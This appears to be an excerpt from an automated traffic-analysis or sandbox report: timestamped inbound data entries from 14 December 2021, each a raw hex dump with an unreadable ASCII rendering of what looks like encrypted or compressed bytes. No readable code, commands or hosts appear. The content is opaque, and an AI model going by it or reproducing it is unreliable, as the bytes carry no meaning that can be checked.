2021-12-14 12:42:36 UTC	127	IN	Data Raw: fe be b7 fc ec 88 8e 28 8b ea fb 20 c5 72 13 7d c2 24 1a be 38 1d a7 c8 43 c5 ba a9 83 55 76 0d 47 c3 19 e6 96 ef 10 40 52 56 8d 4d 21 94 f4 38 ce ca cc 14 2b 04 04 ce a6 da e2 fc b5 d4 0b 91 c6 ce 76 29 da 63 2c 54 2b 2a cc 7a bf 7b 10 98 b0 71 41 d0 8f c9 7a dd e4 c2 05 bd 4e fc cc d5 15 fd 7d 7f 51 c4 38 0f 71 73 6a 36 e8 1a 1d 31 17 76 b1 ec e3 9e 2d 26 a5 94 dd 2b f2 73 9d a3 20 74 40 bf b6 4f 94 7d 72 90 74 79 1d a5 48 57 ed 36 5a 80 ff 53 5c 5b 2c fc 77 0c b4 dd f1 09 ab 3c 7e da b2 e8 08 52 a3 ea f9 5e 02 07 3b b0 16 a9 c3 bf 35 4e 18 ff f6 24 7c 3c 90 41 0b 56 b0 86 0f 09 c9 67 54 86 2e 58 bb 32 bd 4c 24 2e 1c b5 4e ba 8f 92 17 b0 ae 30 fe 17 da e4 75 10 ef 31 61 66 bc f2 a1 6f e1 04 42 a4 c5 f9 f4 95 9e 13 b4 f2 73 77 10 b3 4b 59 37 bc 38 49 1f Data Ascii: ( r}$8CUvG@RVM!8+v)c,T+*z{qAzN}Q8qsj61v-&+s t@O}rtyHW6ZS\[,w<~R^;5N$\|<AVgT.X2L$.N0u1afoBswKY78I
2021-12-14 12:42:36 UTC	128	IN	Data Raw: a1 eb 7a f0 79 ca a3 d5 e9 9c 82 61 7d f5 71 f2 56 a9 f7 4e 9b eb e4 af b0 92 af 0d a9 6b 69 bb 0e 68 ed e1 2d f2 2e 7a 92 7d 0c 89 d9 f9 64 ea ab 26 23 6b 60 aa cd d0 59 02 51 46 2d 26 03 73 ba 39 59 c5 f9 1c 9c a4 75 c9 8f 17 82 64 c9 49 5f 5b 20 76 24 00 ef a8 2c 53 68 70 1f 48 a0 b9 50 b3 4a 12 c4 0a 94 53 81 d4 b3 7c 96 66 26 f9 f9 6f 52 57 85 7c 0f c9 ac f0 80 70 74 66 82 99 99 22 23 18 da 80 4c 9a ef 1c a3 77 0f fe 90 e3 d8 41 2b c5 26 07 a9 81 3d 1e 1a 38 95 10 5d 44 8b 67 ba 9d b7 3d c7 3e 5e d4 a0 3a 73 1f 93 67 22 6c 72 e2 97 d9 b8 2b 37 a5 43 ae 8e 92 f3 56 9f a1 a6 c8 24 d9 a0 d1 6d 79 e6 ba 6d be 1a b7 79 4d e1 62 a2 93 6a 72 0b d2 de dd 07 21 2c 20 77 26 69 31 58 40 96 6e 93 0c 7c 09 4d d9 6c c0 e7 9e 23 91 e8 ec 98 f3 a4 33 b5 76 0c a9 bc Data Ascii: zya}qVNkih-.z}d&#k`YQF-&s9YudI_[ v$,ShpHPJS\|f&oRW\|ptf"#LwA+&=8]Dg=>^:sg"lr+7CV$mymyMbjr!, w&i1X@n\|Ml#3v
2021-12-14 12:42:36 UTC	129	IN	Data Raw: 6c ec 60 cb 26 33 ec e7 4a 23 e9 80 2f 12 3f 25 75 d4 19 9a fe ec ae ed 41 f5 73 e5 0c e9 40 25 e7 e1 23 97 e6 be 28 87 b6 61 55 ba b6 89 e7 7e 22 56 e3 13 1c e8 76 11 60 23 4e b8 d7 1e 91 d7 1c d1 f9 c6 12 57 9d 05 d0 8a d7 71 fc b3 fe fb ca 72 de 50 0d 54 55 b6 71 26 5d ed 65 89 41 b4 b7 b2 71 5f d2 20 b5 e3 da ce ac 5b b6 4f fc c8 50 07 4a 49 74 7f 70 27 38 51 dd 15 31 e8 03 2d 34 38 74 b7 c0 a3 62 ca be a4 90 c6 33 fb 56 b0 ad 9c 4e 55 8e 01 6d 07 7d 69 b8 79 04 1a a3 62 20 bb 82 59 80 fd 66 e7 bf 90 d0 79 2e 8b 70 d1 9f a9 a6 5b eb 8b e3 2a c6 a5 c0 93 00 1d 01 3b b4 17 bb 74 98 18 46 14 62 b2 9d e1 3e 94 61 83 7e 9d 84 95 2a ce 1c 0c 3f ba 58 bf 2d a6 58 06 03 12 84 79 ac ad 31 13 9a 2c 57 4f 3b d8 e0 53 ac 81 4f f8 fd 99 db af 75 5b b7 6f ab e3 c6 Data Ascii: l`&3J#/?%uAs@%#(aU~"Vv`#NWqrPTUq&]eAq_ [OPJItp'8Q1-48tb3VNUm}iyb Yfy.p[;tFb>a~?X-Xy1,WO;SOu[o
2021-12-14 12:42:36 UTC	130	IN	Data Raw: c5 9c 9b d4 bc 39 af db 99 b7 c3 53 e9 7e b3 d3 01 2c d1 43 73 6e 87 88 ea bb c0 dc ef 71 44 49 20 27 ab c3 22 dc 22 02 28 2c 4a 68 3b 75 dc ae 40 a2 77 19 b0 b0 54 77 b8 b9 14 5e 6e 0d d3 77 22 50 21 68 bb e9 6c c9 c8 42 cc 80 e5 fc 42 61 a5 13 aa c6 e1 ae 4e 66 65 d8 20 50 3e d8 b5 6d 69 49 f1 f4 04 44 76 a5 72 64 ed ee fc 47 c0 e4 ab e3 c9 a2 75 3d 53 f3 45 05 82 c5 5b 3b e1 25 73 e2 3a 28 e1 75 13 87 ea 45 0d df 6b 1e 56 07 9a e8 c7 c5 b9 cc ad a4 11 32 9e 53 f4 96 ba a6 e4 8e a4 5d dd 5e f8 20 c7 47 a5 99 7e 08 15 9c 07 83 87 b2 41 5f 9f 9b 98 5b 7b a5 47 c5 33 ac b5 7e 11 40 4c 61 95 d5 04 bf d0 9c af 66 ed 90 2d 24 af d0 8e f7 7a d9 9e ef 47 cf f4 cf 76 2d e5 34 be 71 06 3a c2 48 8b 5b 9a b0 32 0f c0 f9 a2 cf 5a 77 ce a8 7b be 6a d1 d9 ec 02 cb 58 Data Ascii: 9S~,CsnqDI '""(,Jh;u@wTw^nw"P!hlBBaNfe P>miIDvrdGu=SE[;%s:(uEkV2S]^ G~A_[{G3~@Laf-$zGv-4q:H[2Zw{jX
2021-12-14 12:42:36 UTC	131	IN	Data Raw: 71 d2 62 86 d3 1e 50 24 eb 88 03 b1 56 54 b9 2e 4e 3e 68 d0 bf 6d d0 71 06 14 99 12 ed 00 ea 6b 8d 84 55 39 be 39 85 b1 72 56 f3 3e ae e0 01 4f 7a 78 9c 42 1e fe 19 e8 e8 82 ee 6c 3b 45 2a 1c 96 68 a2 0a b9 53 64 e2 a9 c1 bf f6 02 e2 71 50 d3 75 36 4f 6c 89 90 1f 68 77 6a 29 d8 be 51 69 d4 17 19 38 6b 49 71 86 83 09 42 a7 c7 4a 69 41 2b 19 f8 0e fc f2 c2 4a 31 38 84 ec ce d0 3a 01 dd 09 f4 94 6d 12 64 43 c1 ba 2c 95 66 1a 5f a1 10 65 c1 0c c2 27 9e 73 86 9e 55 da 86 cb ae ef 1a 50 a6 f9 ed ba 9d 1d 7e b6 58 f0 56 b0 d4 e0 c8 70 e5 a9 9e dc 00 94 a8 6b f7 81 47 e0 ee ec f3 d4 31 1e 92 2d 03 89 d9 f9 61 ea ab 26 23 6b 60 46 cd d0 59 02 51 79 9a bc 26 5e 2e 3a 6b b2 ff a8 4a a4 75 d5 87 73 8b 64 cf 7c 17 0d 94 75 24 02 da 48 c8 ef 44 7f 3d 77 15 99 ca b7 d0 Data Ascii: qbP$VT.N>hmqkU99rV>OzxBl;E*hSdqPu6Olhwj)Qi8kIqBJiA+J18:mdC,f_e'sUP~XVpkG1-a&#k`FYQy&^.:kJusd\|u$HD=w
2021-12-14 12:42:36 UTC	133	IN	Data Raw: b0 6e e7 d3 bc 59 96 37 bf d0 77 c0 09 6c 3b 0a 87 91 83 e4 4d b9 19 58 fb 3c b7 59 76 5e 4a b8 e1 d4 0c 74 43 53 6c a9 98 e2 ac e8 ee f4 59 6f 61 a2 5f 18 44 5c 41 03 f6 2c 0c ec f2 1e 58 57 ad 4d 44 51 39 16 90 57 79 98 90 01 76 43 10 c5 59 25 d0 5f f7 90 6f 16 70 3c 42 c8 a0 d8 d9 6f 70 19 16 72 d4 c7 8e c9 6c 6b d8 00 75 1e f5 b7 72 66 4b 5e 88 9d 43 5c 27 2c 0b ec ee f8 fd 4d c9 ba c5 73 71 58 2f 75 f3 e3 0b 82 c5 61 5b c4 27 73 fb 00 82 b2 ee 12 81 c4 e7 84 46 6a 1e c8 02 1e f9 e1 e5 d4 e9 80 b5 17 00 39 53 f4 8c b2 d3 ee 8e a2 6c 77 0d 63 21 c1 69 07 1f e7 09 15 02 02 04 96 94 61 3d ba b6 89 5d 4d 01 47 c5 2a a4 c5 74 11 46 7c cb c6 4e 05 b9 fe 3e 28 ff ec 90 b3 21 29 c1 a8 d7 19 fc b3 fe 41 f6 51 cf 76 30 ed 78 b4 71 00 0e 68 1b 10 5a 9c 9e 90 8b Data Ascii: nY7wl;MX<Yv^JtCSlYoa_D\A,XWMDQ9WyvCY%_op<BoprlkurfK^C\',MsqX/ua['sFj9Slwc!ia=]MG*tF\|N>(!)AQv0xqhZ
2021-12-14 12:42:36 UTC	134	IN	Data Raw: 32 95 2b 81 fc 71 65 05 af d3 bd 54 e7 b3 a2 35 71 da ae fb 81 f9 9c 0e a7 eb 88 07 0b bf 79 ab 08 f4 01 44 c2 99 6d 1b 61 06 14 a6 75 cf 2d e8 74 a8 86 fa 45 27 3e af 33 2c d4 f3 3e aa 5a e9 62 6b 5e 26 7c 32 ec 3f e8 32 92 ee 6c 05 f7 0d 1e 96 71 ab a4 ea c8 65 e4 87 67 dd 6e 03 e2 ef 55 30 67 10 6f ea ad bd 0d 6e 48 b4 29 d8 a1 50 fc f3 15 19 21 63 e7 22 1d 82 0f 6c 01 a4 d2 68 41 b5 1c 1a 1c da d2 45 6e 1c 2a 82 8c 11 d0 3a 1e f4 fe d3 96 6d 0b 6c ed 92 21 2d 93 48 bc 3f 39 11 65 5f 09 3f 35 b8 53 02 ba 78 c8 80 a2 6e ef 1a 4f 95 d0 cb b8 9d 04 77 1c 0b 6b 57 b6 fa 46 a9 e8 e4 a9 00 d9 fc 85 8e 4b 72 a5 6a f2 e8 90 32 d4 31 05 9a 24 0a 89 df cc c2 bc 1f 25 23 69 6a e0 b2 49 58 98 70 74 5a 9a 06 7e b5 1f 46 80 b8 98 98 a4 6a da 8f 17 82 64 c9 49 b3 5b Data Ascii: 2+qeT5qyDmau-tE'>3,>Zbk^&\|2?2lqegnU0gonH)P!c"lhAEn*:ml!-H?9e_?5SxnOwkWFKrj21$%#ijIXptZ~FjdI[
2021-12-14 12:42:36 UTC	135	IN	Data Raw: 84 cc ad fb e7 10 ce 48 78 43 ef 11 c5 2f 10 91 5c 53 6e e7 c8 b4 8f 99 37 b9 e7 d9 93 92 6d 3d 24 25 ae 1b e5 4d 27 1c 86 e9 1a 97 82 52 73 5b be 32 36 0c 74 5c 57 46 8a 9a e2 bd ea 45 88 c0 68 4b 24 01 c3 44 5c 45 b9 27 01 1e ca 48 79 74 46 8b 4d a7 43 39 16 af 47 5f b5 92 1c 58 44 94 bb c6 0e 52 25 4e d2 6e 12 50 53 67 e5 b2 64 dc 01 60 3f 36 a7 fe d5 8e e9 79 41 f0 2d 6d 36 de 9f f4 1e f8 dd f6 00 62 18 22 0c fd 76 cb d5 75 4e c4 ef e2 53 87 78 61 67 d3 ed 1a 9d ed 56 71 e9 23 59 7b 54 99 cd 77 17 a1 85 c6 73 46 f0 3b 7f 35 15 c8 82 c4 23 e9 a0 d8 25 12 37 4c d0 be b7 fc ec 88 8e c0 8b ea fb 20 c5 4d 61 e6 e7 09 8f bd 0a 3b a1 92 07 c4 ba b6 a9 ec 49 0f 47 da 10 a4 c5 74 11 46 7c cf c6 4e 05 b9 fe 3e 96 fe ec 90 b3 21 29 c2 a8 d7 a7 fd b3 fe 41 5b 4d Data Ascii: HxC/\Sn7m=$%M'Rs[26t\WFEhK$D\E'HytFMC9G_XDR%NnPSgd`?6yA-m6b"vuNSxagVq#Y{TwsF;5#%7L Ma;IGtF\|N>!)A[M
2021-12-14 12:42:36 UTC	136	IN	Data Raw: b5 27 00 9c df 6e 7e 3e b4 cb 27 a8 97 52 33 a6 93 13 8c 2a 1b d9 7c 75 33 8f b4 a0 7c ca 91 cf 26 5b 5c cd 4a ad fb 98 28 97 68 f6 9e 90 9a 50 99 46 d5 1b 45 58 bc 60 0d 57 26 7c b8 65 e7 20 9e 61 ae ac 66 13 93 3d af 31 26 4d 8c a7 ab c0 c8 6f 13 79 06 67 a9 c9 12 d9 03 a2 87 6d 1b df 00 60 83 77 81 3c bc 7c 66 e4 85 6d 43 11 9a e3 75 74 3d 1f 37 4f f6 36 98 20 5f 71 84 43 d9 be 71 f4 5a 02 19 27 53 49 71 86 83 09 42 a3 c7 4a 69 41 2b 19 5c 0f fc f2 c2 4a 31 3b 84 ec 6a d1 3a 01 dd 5e eb 94 6d 17 6e 46 ee b8 2a b9 ce e2 b8 39 11 61 e5 40 13 27 9e e9 39 96 69 ee 80 87 7f ef 1a 70 0a ed e6 ba 86 2a 70 9c 75 f4 7c 30 80 ff b7 e9 e0 89 f7 fd d1 94 32 4e 40 b6 4c d2 a5 cd 22 d4 11 8f a7 09 08 96 d2 ce 69 c0 86 22 09 eb 34 59 b2 49 5c 22 3b 58 48 bc bc 7b 99 Data Ascii: 'n~>'R3\|u3\|&[\J(hPFEX`W&\|e af=1&Moygm`w<\|fmCut=7O6 _qCqZ'SIqBJiA+\J1;j:^mnF9a@'9ip*pu\|02N@L"i"4YI\";XH{
2021-12-14 12:42:36 UTC	138	IN	Data Raw: 46 ce b3 21 b1 77 d1 f6 8d 22 3d 9d 5f 11 c5 20 82 22 f2 35 fa e7 8e cb eb 68 65 cf cb e1 02 02 97 92 cc 6f e7 d3 bc 0a 8c 37 bf d2 56 c5 26 6e 3d 26 2f 69 64 7c 4c bd 3d 8b 74 3d b7 c3 c9 56 76 8c e7 07 83 75 43 73 4e 16 8f e2 bb df d0 de 74 6b 4b 26 0b 07 3b c5 44 23 06 0c 9c ed 68 3b ef 63 a6 7f 96 71 a9 17 b0 54 57 5c 87 1c 5e 71 1b ed 72 0d 52 27 44 17 11 8b 51 c9 46 e8 31 43 fc 42 fb 1a 1b 95 f2 e7 1f e8 66 65 f8 cd 78 36 d8 aa 7c 48 4c de f6 02 68 da 5d 95 fc ec ea d8 f5 69 e4 ab 79 76 aa 4a 09 55 41 ec 05 82 e5 a0 64 e9 25 6c f1 02 2d ce 77 15 ab 42 b9 ea 47 6a 1a 72 b4 32 e8 c7 5f 06 c4 91 93 17 81 36 53 f4 b6 7d e9 ec 8e bd 6e d8 71 fa 26 eb ef 59 7e e6 09 11 b8 b3 28 87 b2 db e0 97 a7 af 5d cf 0e 47 c5 13 66 ff 76 11 5b 7e 64 ba d7 02 93 78 60 Data Ascii: F!w"=_ "5heo7V&n=&/id\|L=t=VvuCsNtkK&;D#h;cqTW\^qrR'DQF1CBfex6\|HLh]iyvJUAd%l-wBGjr2_6S}nq&Y~(]Gfv[~dx`
2021-12-14 12:42:36 UTC	139	IN	Data Raw: 56 17 90 69 d8 d3 bd f6 be 73 35 38 6f ab fd ce e5 b7 38 17 9e 70 12 e7 39 9e 4d 79 84 97 52 37 1c d1 3f 9d 0c a1 49 50 64 15 8f 85 b8 7c ca ad 8a 1e 59 5c d6 48 02 87 01 2f bd ee a8 b1 90 9a 54 23 0b f9 0a 63 e2 2f 4c 1c 71 26 48 a0 65 e7 1d c2 59 ac ac 7e 11 3c 41 36 36 0c cb d2 89 ab c0 cc d5 5f 55 17 41 13 5b 3e c8 25 a2 8d 75 1b df 37 34 bb 75 81 24 be d3 1a 7d 82 47 c5 4f bb e3 75 70 87 50 1b 5e d0 8c 05 0c 4e 57 84 4d c1 be 71 c8 f6 3a 1b 27 4f 4b de fa 1a 0e 68 25 99 6a 69 41 2f a3 12 23 ed d4 78 d6 1d 2a a2 ec 6b c9 3a 01 e0 fe d3 96 6d 0b 6c e9 92 21 2d 93 48 bc 9b 39 11 65 5f 09 3f 36 b8 53 a6 ba 78 c8 80 9a 67 ef 1a 4c ae d5 e4 ba 9b 28 df e0 ec f3 56 b2 de dd b7 e9 e4 33 bf d1 c0 b2 88 d0 6c a4 6a d2 bf d5 22 d4 2c 36 9f 0b 08 8f f3 60 3a 5b Data Ascii: Vis58o8p9MyR7?IPd\|Y\H/T#c/Lq&HeY~<A66_UA[>%u74u$}GOupP^NWMq:'OKh%jiA/#x*k:ml!-H9e_?6SxgL(V3lj",6`:[
2021-12-14 12:42:36 UTC	140	IN	Data Raw: 01 35 4e 6d 28 15 75 4f 90 54 e3 2c 94 1a 65 f4 71 cb c9 99 a3 ef 77 c7 f6 89 1d ee b4 72 13 5f 03 85 b5 aa 8c 27 e6 8a eb 45 4f 7e cf 51 d3 07 3d b3 b2 44 44 65 ad 05 a3 9b 33 9f 10 5e ed 0b f6 18 0d 14 c9 3a 38 4c bd 39 8b dc 27 b7 c3 4b 5b 76 9c c1 21 26 f2 3d ea 6f a7 9c c2 65 c1 c3 f6 c3 4c 66 32 07 a1 9b 5d 45 23 22 05 17 ec 68 24 7e 6e a6 6f b0 57 13 90 ce cd 76 98 94 3c 81 6f 12 c5 c5 2a 7f 33 48 b1 b0 13 50 c9 62 fc bb 42 fc 5d 71 17 1b 85 d4 c1 a4 6f 18 fc d9 00 6b 16 38 b4 72 60 fb f9 db 16 64 7c c3 0d fd ec ce bc 7c 68 e4 b4 c0 7b aa 5a 2f 73 f9 6f 7b 1b c4 7b 77 c9 c4 72 fd 2a 9a e9 5a 02 a7 e0 26 72 46 6a 3e 35 3c 33 e8 de ed 0e eb 80 b3 1d 90 49 ca f5 96 9e de 0e 8f a4 46 6f 56 d7 31 e7 4d c5 e6 e7 09 35 f2 3c 29 87 af 69 e8 b8 b6 8f 57 dd Data Ascii: 5Nm(uOT,eqwr_'EO~Q=DDe3^:8L9'K[v!&=oeLf2]E#"h$~noWv<o3HPbB]qok8r`d\|\|h{Z/so{{wrZ&rFj>5<3IFoV1M5<)iW
2021-12-14 12:42:36 UTC	141	IN	Data Raw: c4 27 23 10 91 51 81 8f fe 09 b0 ae 36 dc 12 f5 e6 73 3c ab cd 86 fe bd f6 ba 73 78 23 6f ab 79 c3 e5 a4 1e 31 b7 f0 6c 7e 18 47 55 59 31 8a 7a 1a 84 f4 14 a6 ac ff 65 50 64 11 8f d7 a3 7c ca 2b 87 1e 49 7a f0 66 82 f9 98 0e 62 f6 88 07 8e 91 7c 94 2c d4 1d 6f 40 e7 d4 1d 71 02 34 bc 67 e7 00 70 51 83 bd 5e 1b bb 3d af 37 2c 25 ee 3e aa db e4 62 78 78 00 4d b5 92 a6 c9 25 86 ce 6a 19 df 20 86 b3 5a 93 04 b4 57 66 e4 83 67 2e 73 03 e2 6a 7c 35 58 34 4f f0 86 3b 73 d7 56 a4 2d f8 b9 73 d4 de 8d 3c 0a 5b 47 7c 83 81 0f 68 01 42 cf 68 41 30 2f 1f 23 fe f2 5e 45 9e 54 3b cd 01 d4 1a 09 ff d6 fe 0e 48 20 57 4d cc b0 2e 93 4c bc 30 25 11 65 db 04 3f 25 9e 75 36 3d 06 51 a1 eb 7a cf 13 52 86 f8 7c 9f b0 10 7b be 7c f0 56 b6 de 7f ab e9 e4 b6 91 d4 fc 96 a8 6d 47 Data Ascii: '#Q6s<sx#oy1l~GUY1zePd\|+Izfb\|,o@q4gpQ^=7,%>bxxM%j ZWfg.sj\|5X4O;sV-s<[G\|hBhA0/#^ET;H WM.L0%e?%u6=QzR\|{\|VmG
2021-12-14 12:42:36 UTC	143	IN	Data Raw: be f0 b1 79 4d 64 62 a7 ac 4e 52 24 fa b0 a3 be 45 33 24 68 52 89 3c 58 4d b0 77 d2 aa ea 94 4c d9 77 eb e5 b1 21 91 74 e3 db 9f 1b 12 9f 70 13 c5 06 77 bb 8c ac e4 bf a2 c6 67 69 63 e5 d7 ba b6 11 b1 b6 62 45 e5 d3 9c 38 be 1a ad eb 7f c6 09 6c 3d 00 32 cf 1a e5 52 e5 11 86 f9 3c b1 e9 d1 0d c2 9f c1 23 2c 58 41 73 6e 3d bd cf aa e6 e3 da 5b 69 4b 00 ae a1 45 5c 5e 0b 2f 2e 0c ea 42 bd 0b df 8a 6d b4 71 14 14 b0 54 ed bd bd 0e 78 4e 3f c7 5f 0f 72 b5 4e 91 6f 0d 5d e1 6f ca a0 44 d6 c4 1f a6 37 87 d0 e7 a0 eb 66 65 42 25 42 24 fe 95 5c 62 61 dc d6 a5 62 5c 23 13 f0 c4 c3 fa 67 6e ce 2d 9d ca 86 58 2b 55 fc ef 05 82 5f 5e 5e fb 03 53 d2 28 00 cc 57 bd a1 c0 c7 6c 4b 42 33 50 27 35 c2 41 bb ba e8 80 b1 17 22 35 53 f4 0c bf d3 fe a8 84 76 f7 73 fa 00 7a 4d Data Ascii: yMdbNR$E3$hR<XMwLw!tpwgicbE8l=2R<#,XAsn=[iKE\^/.BmqTxN?_rNo]oD7feB%B$\bab\#gn-X+U_^^S(WlKB3P'5A"5SvszM
2021-12-14 12:42:36 UTC	144	IN	Data Raw: ba c7 68 e7 9c 84 0b 2f b3 0f 2a 1f b5 7d 92 3f a0 f6 51 01 12 93 71 55 8d 31 15 af 8a 01 fb 38 d8 e2 59 bc ff d6 f9 67 b8 d6 ef 51 7b 21 f5 8e ce f4 ee 95 69 13 b4 f2 4c 86 1a 9e 49 46 3a be 7f 35 86 f2 38 0a 54 18 fd 51 60 35 fd d1 a1 7c 50 94 8f 21 7d 7c 82 60 80 f9 b8 2d 9e ea 88 18 8b b2 79 bb 2e d2 31 c3 bc 00 4c 1c 75 26 47 bb 65 e7 9a cf 59 bc 8a 58 68 bc 3f af 17 11 ec f2 3e b5 d8 e4 62 78 78 00 4d b5 92 a6 c9 25 86 ce 38 19 df 20 86 b3 5a 93 04 b4 05 66 e4 83 67 f4 4c 03 e2 6a 64 35 58 34 4f f0 86 3f 73 d7 56 a4 2d f8 eb 73 d4 de 8d 3c 0a 58 47 7c d1 81 0f 68 01 f0 f0 68 41 31 11 1a 0c fc f4 72 e9 62 b3 a3 cc 05 f0 6c 03 fd d6 64 b1 40 1f 60 4b ba ba 2c 93 6c cd 02 38 11 7a dd 04 3f 25 9e 75 36 3d 06 51 a1 eb 7a cf 4d 52 86 f8 7c 9f b0 10 7b be Data Ascii: h/*}?QqU18YgQ{!iLIF:58TQ`5\|P!}\|`-y.1Lu&GeYXh?>bxxM%8 ZfgLjd5X4O?sV-s<XG\|hhA1rbld@`K,l8z?%u6=QzMR\|{
2021-12-14 12:42:36 UTC	145	IN	Data Raw: ad b8 9d 37 0d 88 8b ce 3b b5 10 72 3e ef c1 a5 03 be ae b1 79 4d 64 62 a7 ac 4e 52 7a fa b0 a3 be 0b 09 24 68 52 e3 3c 58 4d b0 77 d2 aa ea 94 4c d9 77 eb b7 b1 21 91 74 e3 db 9f 1b 12 cd 70 13 c5 06 93 81 8c ac e4 c6 a2 c6 67 69 63 e5 d7 ba b6 11 b1 b6 62 17 e5 d3 9c 38 be 1a ad eb 7f 94 09 6c 3d 00 59 ca 1a e5 52 b4 11 86 f9 3c b1 e9 d5 0d c2 9f c1 23 2c 0e 41 73 6e 3d bd cf a9 e6 e3 8c 5b 69 4b 00 44 a4 45 5c 5a 02 2a 01 0e ec 6e 11 f3 38 12 6c b0 55 19 6d b2 54 77 02 b5 31 4c 48 32 be 5d 0f 52 01 e8 b4 6f 12 4f e1 6a e5 a2 42 fa 68 e3 41 af 86 d4 c3 ae 95 64 65 d8 9a 4a 1b c9 93 52 1c 63 dc f6 24 ec 79 23 0c ea c4 c3 fa 67 6e ce 29 9d ca 86 58 2b 55 ae ef 05 82 5f 5e 5e f8 03 53 80 28 00 cc 57 bc a4 c0 c7 64 6e 47 1c 52 21 19 6e b9 5c 22 e9 84 95 49 Data Ascii: 7;r>yMdbNRz$hR<XMwLw!tpgicb8l=YR<#,Asn=[iKDE\Z*n8lUmTw1LH2]RoOjBhAdeJRc$y#gn)X+U_^^S(WdnGR!n\"I
2021-12-14 12:42:36 UTC	146	IN	Data Raw: 26 23 6d 6a bd 95 49 58 1d 5b 71 65 be 26 58 9e 99 38 39 d8 88 9c 84 f8 d7 a7 3a 1a 41 e2 71 17 05 34 75 24 04 d0 45 90 76 45 60 2f 7f eb 9b ca b1 60 94 a5 83 bd 7e 87 f4 3b 54 fc 18 25 dd d4 79 6b 10 91 5b 22 c7 aa 4e c1 50 de 7d 97 b1 af 08 0e 1c f0 04 18 6d 90 85 a6 57 84 e3 f8 79 67 49 09 f2 1f 4f 06 2c 39 1e 3a 91 bc 38 70 51 a3 4c 92 f7 cf 8e 44 40 c3 ca c9 a4 76 a2 9f 41 3d 9f 77 71 82 ff 98 a0 1d 88 41 8e 3f 9e 9d 28 1e 88 8b ce 3b b5 10 76 3e ef c1 a5 03 be 48 b1 79 4d 64 62 a7 af 4e 52 9c fa b0 a3 be 99 0a 24 68 5a db 39 77 4f b6 5b 7a 52 0d 0c 4d dd 53 59 cd b3 21 0b cb eb e7 ab 1d a0 b7 72 13 e5 9c 8e a4 8c b4 d3 ca 88 eb 63 43 e7 b1 c8 c5 2f 14 91 21 40 6e e7 49 b9 8f 8a 11 9f 5e 5d ed 0b 4c 81 06 05 ef 0d cd 60 bf 39 ad d1 be c9 5a 52 73 5f Data Ascii: &#mjIX[qe&X89:Aq4u$EvE`/`~;T%yk["NP}mWygIO,9:8pQLD@vA=wqA?(;v>HyMdbNR$hZ9wO[zRMSY!rcC/!@nI^]L`9ZRs_
2021-12-14 12:42:36 UTC	147	IN	Data Raw: 47 c5 2c 94 c0 5b 13 40 50 63 3e a9 9d b8 fa 1a f1 4b ee 90 29 9e 21 fd 9c d1 c0 48 b1 fe 61 cf 89 e8 76 2d da 58 9e 5c 04 24 ec 4f 0b 25 05 9b b0 75 79 4d a0 cb 7a 41 eb 85 6a 02 6f 49 ca ca 22 47 bb 75 5f e2 3e 10 7c ff 68 30 c2 81 4b 85 14 76 b3 e6 3f e2 b4 27 3f b5 ef 02 4e 76 06 af 06 6b 58 79 00 4d 94 64 41 95 5b 7b 1b 89 e4 43 0a ae 5b 84 db fb 67 c1 09 4b 5c 07 b9 c2 f1 28 ab 3c 7e e6 73 e2 0a 52 ba c9 bb 0d 99 06 3d 9e 8b ed c0 9b 18 44 1e 58 ce 04 e0 a4 b5 6c 07 58 bd 3c 0d 0f e3 2d d8 38 2f 58 a1 05 ab d4 01 05 38 15 2f 18 ae 31 11 90 17 2b d6 3a 42 c1 5e 28 a7 6f 41 65 bc f6 9e a9 5c 21 6f b4 ef ce e5 b7 38 17 9e 74 12 e7 39 9e 4d 79 8b 94 52 37 1c d1 3f 9e 0c a1 46 53 64 15 8f d5 89 7c ca ae ab 1b 76 5e d0 64 aa 7f e6 b7 bc ea 8c 27 2a 98 54 Data Ascii: G,[@Pc>K)!Hav-X\$O%uyMzAjoI"Gu_>\|h0Kv?'?NvkXyMdA[{C[gK\(<~sR=DXlX<-8/X8/1+:B^(oAe\!o8t9MyR7?FSd\|v^d'*T
2021-12-14 12:42:36 UTC	149	IN	Data Raw: 4c d2 12 ce 22 d4 11 0d 99 09 08 96 d0 ce 69 c0 86 22 09 eb 34 59 b2 49 5c 22 8e 5b 48 bc bc 7b 99 0d 60 80 02 8a 98 a4 55 c9 8c 3a 80 7b c5 4b 1c 27 b9 71 0e 82 8e 57 b7 76 41 5f e5 55 c6 99 50 92 67 00 fd 3a 60 7c 83 d4 95 70 d7 18 bf e7 dd 43 60 32 1f 5f 08 41 f4 76 e6 50 da 42 5f 9b 82 0a 94 3f f7 94 40 d4 4c 87 a2 77 2b ab d3 79 fd 73 2d cb 14 6d 89 28 13 98 64 be 9b 38 74 66 55 63 90 f7 53 81 eb 2c 7c eb 17 a2 56 32 bd 12 16 05 52 43 98 f1 95 32 1f 8e 6b 28 f6 21 9c 28 02 80 79 ce 3b b3 a0 d1 6d 64 e6 85 d8 9c d9 b3 59 13 d5 47 8a a1 67 5a 20 fa b0 a5 b4 a6 52 bd 69 4d f7 34 95 4d b0 71 62 09 b9 1f 6b f9 93 c9 cf b3 01 fc c5 c6 f6 92 31 1a 98 70 13 c3 0c 2e da 15 ad fb e3 aa 0a 67 69 65 55 74 e9 3d 36 91 53 40 6e e7 f3 e5 89 9b 37 a0 e9 77 c0 09 6c Data Ascii: L"i"4YI\"[H{`U:{K'qWvA_UPg:`\|pC`2_AvPB_?@Lw+ys-m(d8tfUcS,\|V2RC2k(!(y;mdYGgZ RiM4Mqbk1p.gieUt=6S@n7wl
2021-12-14 12:42:36 UTC	150	IN	Data Raw: e4 e7 09 8f bd 0a 3b a1 92 40 c6 ba b6 a9 69 76 0f 47 da 39 a4 c5 74 11 46 7c cb c6 4e 05 b9 fe 3e d3 fc ec 90 b3 21 29 c1 a8 d7 e2 ff b3 fe 41 f1 72 cf 76 33 ed 78 b4 71 00 0e 6c 1b 10 5a 9c 9e 90 72 5a f8 a2 51 5f f6 dc 8e 5b 27 4c fc c8 ea 04 4a 58 52 40 f3 0f 15 53 fd 6e 1c 6e 7d ac 1d 15 72 97 c2 8a e0 b4 bd 80 bd d0 35 48 52 b3 ad 06 4b 4f b2 27 4d 8b 6c 41 95 5b 7b 1b 89 e4 43 0a ae 5b 84 db 49 66 c1 09 4b 5c 07 b9 c2 f1 9a aa 3c 7e e6 d2 e8 0a 52 ba cf bb 0d 99 06 3d 9e 8f ed c0 9b 18 44 1e e6 cf 04 e0 a4 b5 6c 04 58 bd 82 0c 0f e3 2d 7d 32 2f 58 a0 22 ae fb 03 03 14 b9 d3 ff 36 30 15 b4 8e 2e d5 3a d8 7e 56 17 90 69 d8 60 bf f6 be 73 1d 0c 6f ab fd ce e5 b7 38 17 9e 70 12 e7 39 9e 4d 79 39 95 